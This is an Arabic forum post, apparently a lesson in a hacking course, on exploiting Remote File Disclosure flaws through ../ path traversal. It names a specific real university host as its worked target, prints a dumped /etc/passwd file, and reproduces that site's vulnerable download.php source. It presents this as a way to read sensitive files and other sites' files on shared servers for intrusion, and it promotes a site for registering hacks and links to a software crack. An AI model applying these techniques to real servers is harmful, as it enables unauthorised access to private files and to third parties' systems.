السلام عليكم و رحمة الله وبركاته --==/=/=/=/=/=/================================================== ===================/=/=/=/=/=/==-- الدورة التعليمية لاختراق المواقع و السيرفرات مقدمة من طرف ASDELY & SCORPION --==/=/=/=/=/=/================================================== ===================/=/=/=/=/=/==-- --==/=/=/=/=/=/=========================================/=/=/=/=/=/==-- شرح استغلال ثغرات Remote File Disclosure --==/=/=/=/=/=/=========================================/=/=/=/=/=/==-- تفيدنا ثغرات Remote File Disclosure في قراءة ملفات حق سرفر الموقع , وبذلك ممكن قراءة ملفات مهمة تفيدنا في الاختراق مثل ملفات /etc/ (passwd , valiases..) كما بامكاننا قراءة ملفات اي موقع بالسرفر لكن مع احترام مكانه في السرفر . اولا سوف نشرح على ثغرة في سكربت USP FOSS Distribution , رابط الثغرة : http://www.milw0rm.com/exploits/3794 اوكي سوف امر الى التطبيق مباشرة لان تم شرح كيفية التعامل مع ثغرات الملورم في دروس سابقة >> ################################################## ################################# root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown ................ ################################################## ################################# كما لاحضتم تم قراءة محتوى ملف /etc/passwd ملاحضة هامة : لقراءة ملف ما وارد بالموقع اللي مصاب بالثغرة (riemann.usp.ac.fj/~uspfoss/ في مثالنا الحالي) يكفي التلاعب بهذه العلامة التي تدل على خطوة الى الوراء : ../ مثلا نعلم ان الملف download.php وارد عالموقع واريد رأية السرس كود حقه : >> ################################################## ################################# <?php // <!--sphider_noindex--> $file = @$_GET['dnld']; header('Content-Description: File Transfer'); header('Content-Type: application/force-download'); header('Content-Length: ' . filesize($file)); header('Content-Disposition: attachment; filename=' . basename($file)); readfile($file); // <!--/sphider_noindex--> ?> ################################################## ################################# >> ملاحضة : لو اردنا قراءة ملف حق موقع اخر بالسرفر يكفي التلاعب بهذه العلامات ../../../../../../ لكن مع احترام المسار اللي حصلنا عليها عند قراءة ملف /etc/passwd انتهى الشرح
فيديو اليوم اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له . سجل إختراقك الأن في Aljyyosh.org بمميزات عديده من مواضيعي: 1 - عمل ايميل ياهو - ياهو 2 - عمل ايميل - انشاء ايميل 3 - كيف اسوي ايميل - انشاء ايميل 4 - تحميل الياهو 5 - برامج حماية 6 - دورة اختراق المواقع 7 - فتح المواقع المحجوبة 8 - لعبة فيفا 2012 9 - لعبة كاونتر سترايك 10 - لعبة GTA San Andreas 11 - استعادة الملفات 12 - فك الضغط 11 - لعبة صلاح الدين 12 - لعبة فاي ستي 13 - لعبة pes 2012 14 - عمل فيس بوك - فيس بوك 15 - فوتو فونيا - photofunia 2012 16 - برنامج تشارلز - برنامج Charles 17 - تحميل برنامج داون لود مانجر 18 - برنامج Internet Download Manager 19 - تحميل انترنت اكسبلورر 20 - لعبة جاتا - تحميل لعبة جاتا - لعبة gta 21 - لعبة نيد فور سبيد - لعبة need for speed 22 - لعبة كراش - لعبة crash 23 - لعبة ماين كرافت - لعبة MineCraft 24 - برامج - تحميل برامج - تحميل العاب 25 - تحميل برنامج محول الصوتيات 26 - برنامج تركيب الصور 27 - كراك idm 28 - تحميل كاسبر سكاي 29 - تحميل ماسنجر بلس 30 - برنامج تسريع النت سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ
قوانين المنتدى
